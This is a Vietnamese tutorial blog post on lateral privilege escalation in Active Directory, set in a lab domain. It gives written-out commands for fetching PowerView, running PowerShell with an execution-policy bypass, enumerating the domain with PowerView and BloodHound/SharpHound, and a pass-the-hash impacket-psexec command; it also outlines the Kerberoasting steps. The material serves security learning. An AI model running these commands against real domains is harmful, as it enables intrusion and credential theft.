0
0
Lập trình
Thaycacac
Thaycacac thaycacac

Hướng Dẫn Chi Tiết Cách Leo Thang Đặc Quyền Ngang Trên Active Directory

Đăng vào 1 tháng trước

• 3 phút đọc

Giới thiệu

Trong các bài viết trước, chúng ta đã cùng tìm hiểu về các phương pháp leo thang đặc quyền ngang trên hệ điều hành Windows và Linux. Tuy nhiên, với sự phát triển mạnh mẽ của mô hình Active Directory (AD) trong các tổ chức doanh nghiệp ngày nay, việc nắm vững kiến thức tấn công trong môi trường này là vô cùng quan trọng. Bài viết dưới đây sẽ hướng dẫn bạn từng bước về cách thức leo thang đặc quyền ngang trên Active Directory.

1. Tổng Quan Về Active Directory và Môi Trường Máy Tính

1.1 Mô Hình Môi Trường

  • Windows Server 2019 (Domain Controller) - Tên máy: DC02.SUN.LOCAL
  • Windows 11 (64 bit) - Tên máy: HR2.SUN.LOCAL
  • Tên Miền: SUN.LOCAL
  • Tài Khoản: minhtuan@sun.local, quandao@sun.local

1.2 Dò Quét Thông Tin Trong Active Directory

Active Directory cung cấp nhiều công cụ hữu ích hơn so với Workgroup cho việc dò quét và thu thập thông tin. Hai công cụ nổi bật là PowerviewBloodHound.

2. Dò Quét Thông Tin Với Powerview

Powerview là một công cụ tuyệt vời để thu thập thông tin trong môi trường AD. Dưới đây là cách cài đặt và sử dụng Powerview:

2.1 Cài đặt Powerview

Chạy các lệnh sau để tải xuống và cài đặt Powerview:

Copy
Invoke-WebRequest https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1 -OutFile C:\Users\Public\PowerView.ps1
powershell -exec bypass powershell
Import-Module .\C:\Users\Public\PowerView.ps1

2.2 Một Số Lệnh Cơ Bản

  • Get-NetDomain: Xem tên Domain hiện tại
  • Get-DomainController: Xem tên Domain Controller
  • Get-DomainUser: Lấy danh sách toàn bộ người dùng
  • Get-DomainGPO: Lấy danh sách Group Policy Objects
  • Get-NetComputer: Truy xuất danh sách máy tính kết nối trong AD
  • Find-InterestingFile: Tìm kiếm các tệp nhạy cảm trên hệ thống

2.3 Xuất Dữ Liệu

Để xuất danh sách người dùng sang file CSV, sử dụng lệnh:

Copy
Get-DomainUser | Export-PowerViewCSV -Path "users.csv"

3. Dò Quét Thông Tin Với BloodHound

BloodHound là một công cụ mạnh mẽ sử dụng đồ họa để mô hình hóa Active Directory, giúp các tội phạm mạng dễ dàng xác định các mối quan hệ giữa người dùng khác nhau trong AD.

3.1 Cài Đặt BloodHound Trên Kali Linux

Cài đặt Open JDK 11 và Neo4j trước khi cài đặt BloodHound:

Copy
sudo apt-get install openjdk-11-jdk
sudo apt-get install neo4j

Sau đó tải xuống và khởi chạy BloodHound:

Copy
sudo neo4j console
bloodHound

3.2 Thu Thập Dữ Liệu Với SharpHound

Để thu thập thông tin, sử dụng SharpHound. Chạy lệnh sau:

Copy
C:\> SharpHound.exe

3.3 Tìm Kiếm Thông Tin Có Giá Trị

BloodHound hỗ trợ nhiều loại truy vấn phong phú như tìm tất cả Domain Admins, và tìm kiếm máy tính không hỗ trợ hệ điều hành mới.

4. Các Kỹ Thuật Tấn Công Đặc Quyền

4.1 Tấn Công Pass-The-Hash

Với phương thức này, tin tặc sử dụng giá trị hash thay vì mật khẩu để đăng nhập mà không cần bẻ khóa.

Copy
impacket-psexec -hashes aad3b435b51404eeaad335b51404ee:782efc6e0bbff4bd67266a37cca7bf Administrator@ip_bi_anh_huong

4.2 Tấn Công Kerberoasting

Kerberoasting cho phép tin tặc bẻ khóa Kerberos hash bằng kỹ thuật brute-force. Các bước bao gồm:

  • Dò tìm Service Principal Names
  • Yêu cầu Ticket-Granting Service (TGS)
  • Xuất và dump Ticket
  • Thực hiện brute-force với Ticket này.

5. Active Directory Trên Linux

5.1 Kerberos Trên Linux

Linux cũng hỗ trợ Kerberos để xác thực với Active Directory, giúp người dùng Linux có thể đăng nhập vào hệ thống AD như một máy Windows.

6. Kết Luận

Việc nắm vững cách leo thang đặc quyền ngang trên Active Directory không chỉ giúp bạn vào lĩnh vực an ninh mạng mà còn góp phần quan trọng trong việc bảo vệ hệ thống thông tin của tổ chức. Hy vọng bài viết này sẽ hỗ trợ bạn trong việc nắm bắt các kỹ thuật tấn công phổ biến trên AD.
source: viblo

Gợi ý câu hỏi phỏng vấn
Không có dữ liệu

Không có dữ liệu

Bài viết được đề xuất
Bài viết cùng tác giả

Bình luận

Chưa có bình luận nào

Chưa có bình luận nào